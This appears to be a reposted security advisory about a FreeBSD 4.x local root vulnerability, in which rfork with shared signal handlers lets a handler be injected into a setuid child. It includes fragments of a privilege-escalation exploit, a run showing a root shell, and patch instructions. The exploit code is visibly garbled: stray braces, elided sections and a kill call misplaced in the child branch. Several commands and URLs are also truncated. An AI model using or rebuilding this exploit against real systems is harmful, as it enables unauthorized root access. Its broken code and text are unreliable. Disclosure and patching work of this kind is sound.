SoFunction
Updated on 2025-04-13

Local attackers can exploit a FreeBSD 4.3 design vulnerability to obtain system privileges


A design vulnerability was found in FreeBSD 4.3 that allows a user to insert a signal handler into another process. The problem lies in rfork(RFPROC|RFSIGSHARE): the child created this way shares its signal handler table with the parent. If the child then exec()s a setuid program and the parent afterwards installs a signal handler, that handler is also installed in the (now privileged) child. Sending the corresponding signal to the child causes the handler to execute in the child's context.
Using this vulnerability, a local attacker can obtain root privileges.
The following code is intended only for testing and studying this vulnerability; if you use it for improper purposes, you bear the consequences yourself.
-----------------------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............
Affected version:
FreeBSD 4.3 4.2 4.1 4.0
Earlier versions may also be affected
Solution:
None yet
****** 2001-07-14 add by NetDemon(netdemon@) ******
How to use the test program:
netdemon%gcc -o vvbsd
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
Patching method published by FreeBSD (security advisory SA-01:42):
# fetch ftp:///pub/FreeBSD/CERT/patches/SA-01:42/signal-4.
# fetch ftp:///pub/FreeBSD/CERT/patches/SA-01:42/signal-4.
# cd /usr/src/sys/kern
# patch -p < /path/to/patch